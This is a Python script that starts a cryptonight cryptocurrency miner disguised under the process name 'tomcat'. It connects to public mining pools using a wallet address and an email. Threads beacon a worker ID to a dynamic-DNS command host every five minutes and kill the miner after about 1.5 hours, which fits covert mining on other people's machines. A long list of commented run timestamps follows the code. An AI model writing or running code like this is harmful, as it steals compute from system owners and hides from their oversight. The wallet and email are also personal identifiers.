import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:07.871292
#2018-02-17 17:24:03.590127
#2018-02-17 19:13:04.844477
#2018-02-17 21:02:01.657676
#2018-02-17 22:47:07.216265
#2018-02-18 00:31:06.902275
#2018-02-18 02:21:07.562210
#2018-02-18 04:09:01.252727
#2018-02-18 05:58:01.440383
#2018-02-18 07:50:07.728813
#2018-02-18 09:38:01.616125
#2018-02-18 11:23:06.903261
#2018-02-18 13:09:04.715476
#2018-02-18 14:57:04.714094
#2018-02-18 16:46:06.807444
#2018-02-18 18:34:04.386720
#2018-02-18 20:22:06.067107
#2018-02-18 22:08:04.537873
#2018-02-18 23:56:06.223937
#2018-02-19 01:42:01.283994
#2018-02-19 03:30:10.239668
#2018-02-19 05:16:01.966623
#2018-02-19 07:02:07.124441
#2018-02-19 08:49:06.177698
#2018-02-19 10:39:08.658730
#2018-02-19 12:27:09.555246
#2018-02-19 14:14:08.590776
#2018-02-19 16:03:08.401422
#2018-02-19 17:50:11.087827
#2018-02-19 19:37:01.715460
#2018-02-19 21:24:04.695895
#2018-02-19 23:09:08.845534
#2018-02-20 00:54:07.696751
#2018-02-20 02:44:08.009624
#2018-02-20 04:33:05.184321
#2018-02-20 06:17:01.922944
#2018-02-20 08:02:07.034795
#2018-02-20 09:47:07.108395
#2018-02-20 11:31:01.254016
#2018-02-20 13:17:01.803287
#2018-02-20 15:04:08.685843
#2018-02-20 16:49:01.404211
#2018-02-20 18:36:08.330344
#2018-02-20 20:26:05.490980
#2018-02-20 22:11:07.091349
#2018-02-20 23:52:01.350318
#2018-02-21 01:38:06.372225
#2018-02-21 03:27:05.637604
#2018-02-21 05:15:09.004167
#2018-02-21 07:04:05.760382
#2018-02-21 08:50:08.468993
#2018-02-21 10:38:04.429846
#2018-02-21 12:25:10.260614
#2018-02-21 14:12:08.461020
#2018-02-21 15:58:07.382772
#2018-02-21 17:50:14.051709
#2018-02-21 19:37:07.832845
#2018-02-21 21:26:07.139150
#2018-02-21 23:13:06.605483
#2018-02-22 01:02:07.628491
#2018-02-22 02:49:07.246735
#2018-02-22 04:36:06.973352
#2018-02-22 06:21:04.580256
#2018-02-22 08:08:02.054890
#2018-02-22 09:56:07.999065
#2018-02-22 11:41:01.506382
#2018-02-22 13:28:08.284515
#2018-02-22 15:18:01.591907
#2018-02-22 17:04:01.747913
#2018-02-22 18:50:12.704328
#2018-02-22 20:42:01.232890
#2018-02-22 22:27:11.887446
#2018-02-23 00:14:10.783169
#2018-02-23 02:03:06.118075
#2018-02-23 03:51:07.495317
#2018-02-23 05:42:01.592371
#2018-02-23 07:27:01.964105
#2018-02-23 09:30:01.503787
#2018-02-23 11:36:09.987649
#2018-02-23 13:26:06.410500
#2018-02-23 15:11:06.918973
#2018-02-23 17:01:09.090755
#2018-02-23 18:50:11.815276
#2018-02-23 20:37:06.310469
#2018-02-23 22:24:04.040715
#2018-02-24 00:09:04.840673
#2018-02-24 02:01:05.353959
#2018-02-24 03:52:04.657971
#2018-02-24 05:40:06.114552
#2018-02-24 07:28:06.385024
#2018-02-24 09:16:05.246592
#2018-02-24 11:11:07.055657
#2018-02-24 13:00:04.077811
#2018-02-24 14:47:01.292263
#2018-02-24 16:39:03.573635
#2018-02-24 18:27:04.525272
#2018-02-24 20:13:04.148729
#2018-02-24 22:01:03.765594
#2018-02-25 02:35:05.777803
#2018-02-25 06:17:03.563495
#2018-02-25 11:40:01.928599